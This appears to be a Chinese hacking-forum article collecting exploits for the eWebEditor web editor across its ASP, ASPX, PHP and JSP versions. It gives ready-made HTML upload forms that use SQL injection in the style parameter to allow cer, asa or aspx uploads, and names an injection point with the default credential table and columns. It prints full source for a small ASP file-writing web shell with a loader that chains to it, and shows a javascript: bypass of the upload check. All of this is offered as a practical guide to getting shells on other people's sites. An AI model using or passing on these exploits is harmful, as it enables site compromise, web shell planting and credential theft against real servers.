看到这个,大家都知道这是老生长谈了。不就ewebeditor么,网上一找一大堆。

    我这里有些0day和exp是网上找的。但经验与技巧却是我自己的。技术重要,思路也很重要,不说废话了,看下文!

    http://xxxxx.com/ewebeditor.asp?id=NewsContent&style=s_full

    直接这个地址,出现一堆编辑框,有远程上传,先点感叹号!查看版本!

2.1.6 的直接用此 exp:

以下是引用片段:

<HTML><HEAD><TITLE>ewebeditor的upload文件上传exp</TITLE><meta http-equiv="Content-Type" content="text/html; charset=gb2312"> </head><body bgcolor=orange> 
<tr>不是通杀,版本有区别!我就郁闷,落叶那JJ说文章没说清楚,这份EXP就是根据文章写出来的!落叶那家伙的EXP我看半天没看明白有啥区别!<br></tr>
<tr>文件传到了uploadfile目录下了</tr><br>
<tr>不知道算不算0day,我是冰的原点</tr><br>
<tr>至于利用方法就是修改源文件中的action,然后传cer的马马就行了!</tr><br>
<form action="http://要上传的网址/ewebeditor/upload.asp?action=save&type=IMAGE&style=firefox'%20union%20select%20S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt,%20[S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl%20from%20ewebeditor_style%20where%20s_name='standard'%20and%20'a'='a" method=post name=myform enctype="multipart/form-data"><input type=file name=uploadfile size=100 style="width:100%"><input type=submit value=传吧></form>

2.1.6 以前版本的用此 exp:

以下是引用片段:

<H1>ewebeditor asp版 1.0.0 上传漏洞利用程序----By HCocoa</H1><br><br>
<form action="http://要上传的地址/ewebeditor/upload.asp?action=save&type=IMAGE&style=hcocoa' union select S_ID,S_Name,S_Dir,S_EditorHeader,S_Body,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer|aspx',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>

    如果目录不充许执行脚本,要换目录,用这个 exp.... /db 可以自定义,不过要绝对路径!

以下是引用片段:

<form action="http://www.xxx.com/upload.asp?action=save&type=IMAGE&style=horind' union select S_ID,S_Name,S_Dir,S_CSS,[S_UploadDir]%2b'/../db',S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|asa',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">     
<input type=file name=uploadfile size=100><br><br>     
<input type=submit value=Fuck>     
</form>

2.7.0 版本注入点:

    http://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200

    默认表名:eWebEditor_System默认列名:sys_UserName、sys_UserPass,然后利用nbsi进行猜解,对此进行注入取得账号密码。

    ewebeditor 2.7.5 上传漏洞:这个用在修改了可以上传asa但是提示没有工具栏的情况下,作者不明。

以下是引用片段:

<form action="http://要上传的网址/ewebedit/upload.asp?action=save&type=&style=可以上传asa的样式名" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=1 style="width:100%">
<input type=submit value="上传了"></input>
</form>

    这个要下载它的数据库看有没有前辈的脚印才能利用!

    ewebeditor 2.8.0 上传漏洞:前提要开启远程上传,然后传一个webshell.jpg.asp即可,查看源代码即可获得shell地址。

    这0day我从来没成功过,不知道是真还是假!不过用另一个成功过。

    http://xxx.com/ewebeditor.asp?id=NewsContent&style=s_full

    调用这个样式,会出现远程上传按纽,再用下面的方法远程上传!

    远程上传时执行代码,导致 get shell。

1、把 x.jpg.asp xiaoma.ASa 放在同一目录下:

——————————————————————x.jpg.asp—————————————————————

<%  Set fs = CreateObject("Scripting.FileSystemObject")  Set MyTextStream=fs.OpenTextFile(server.MapPath("\xiaoma.asp"),1,false,0)  Thetext=MyTextStream.ReadAll  response.write thetext  %>

——————————————————————x.jpg.asp—————————————————————

—————————————————————xiaoma.ASa—————————————————————

<%on error resume next%> <%ofso="scripting.filesystemobject"%> <%set fso=server.createobject(ofso)%> <%path=request("path")%> <%if path<>"" then%> <%data=request("dama")%> <%set dama=fso.createtextfile(path,true)%> <%dama.write data%> <%if err=0 then%> <%="success"%> <%else%> <%="false"%> <%end if%> <%err.clear%> <%end if%> <%dama.close%> <%set dama=nothing%> <%set fos=nothing%> <%="<form action='' method=post>"%> <%="<input type=text name=path>"%> <%="<br>"%> <%=server.mappath(request.servervariables("script_name"))%> <%="<br>"%> <%=""%> <%="<textarea name=dama cols=50 rows=10 width=30></textarea>"%> <%="<br>"%> <%="<input type=submit value=save>"%> <%="</form>"%>

—————————————————————xiaoma.ASa—————————————————————

2、远程上传 x.jpg.asp:

    会自动执行脚本,上传小马!

    tools 里的一位老大发现的删除文件漏洞,我试过没用,一般都没权限,这里不说。

ASPX 版:

    受影响文件:eWebEditorNet/upload.aspx

    利用方法:添好本地的cer的Shell文件。在浏览器地址栏输入 javascript:lbtnUpload.click(); 就能得到shell。嘿嘿....绕过了限制......成功的上传了ASPX文件....文件默认的上传后保存的地址是eWebEditorNet/UploadFile/现在来看看是否上传成功.....

    PHP 版,给出 exp:

Exp:

<form action="" method=post enctype="multipart/form-data"> 
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> 
URL:<input type=text name=url value="http://192.168.1.110/eWebEditor/" size=100><br> 
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||
gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> 
file:<input type=file name="uploadfile"><br> 
<input type=button value=submit onclick=fsubmit()> 
</form><br> 
<script> 
function fsubmit(){ 
form = document.forms[0]; 
form.action = form.url.value+'php/upload.php?action=save&type=FILE&style=toby57&language=en'; 
alert(form.action); 
form.submit(); 

</script>

    Jsp 的版本,根本没有对上传文件类型进行检测!需要注意的是 Jsp 版本的没有上传按钮!直接选择文件,回车就可以提交了!